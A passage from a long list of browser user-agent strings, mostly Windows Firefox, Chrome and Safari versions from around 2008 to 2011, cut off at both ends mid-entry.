Windows NT 6.0; sv-SE; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; tr-TR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ca; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; 
Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.16) Gecko/20101130 AskTbMYC/3.9.1.14019 Firefox/3.5.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6;MEGAUPLOAD 1.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/1.0.156.0 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.4 (KHTML, like Gecko) Chrome/3.0.194.0 Safari/531.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.5 Safari/532.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) 
Chrome/4.0.227.0 Safari/532.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.246.0 Safari/532.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1025 Safari/532.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.1 Safari/532.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/6.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.370.0 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.999 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.9 (KHTML, like Gecko) Chrome/6.0.400.0 Safari/533.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.596.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.19 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.638.0 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.654.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.669.0 Safari/534.20 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.459.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 
Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) FirePHP/0.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.1b3;MEGAUPLOAD 1.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3;MEGAUPLOAD 1.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100405 Firefox/3.6.3plugin1 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100806 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b1) Gecko/20091014 Firefox/3.6b1 GTB5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a3pre) Gecko/20100306 Firefox3.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 ( .NET 
CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbBT5/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbCDS/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbCS2/3.9.1.14019 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 AskTbFXTV5/3.9.1.14019 Firefox/3.6.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0 -Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.8) Gecko/20100722 AskTbADAP/3.9.1.14019 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 FirePHP/0.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.13) Gecko/20101203 AskTbUT2V5/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.13) Gecko/20101203 AskTbVD/3.8.0.12304 Firefox/3.6.13 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.13) Gecko/20101203 AskTbFXTV5/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ro; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; rv:1.9.2) Gecko/20100105 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.13) 
Gecko/20101203 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; sl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE; rv:1.9.2.13) Gecko/20101203 AskTbIMB/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.2.13) Gecko/20101203 AskTbCLM/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre -Mozilla/5.0 (Windows; Windows NT 5.1; es-ES; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre -Mozilla/5.0 (X11; CrOS i686 0.13.507) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/13.0.763.0 Safari/534.35 -Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.23 (KHTML, like Gecko) Chrome/11.0.686.3 Safari/534.23 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like 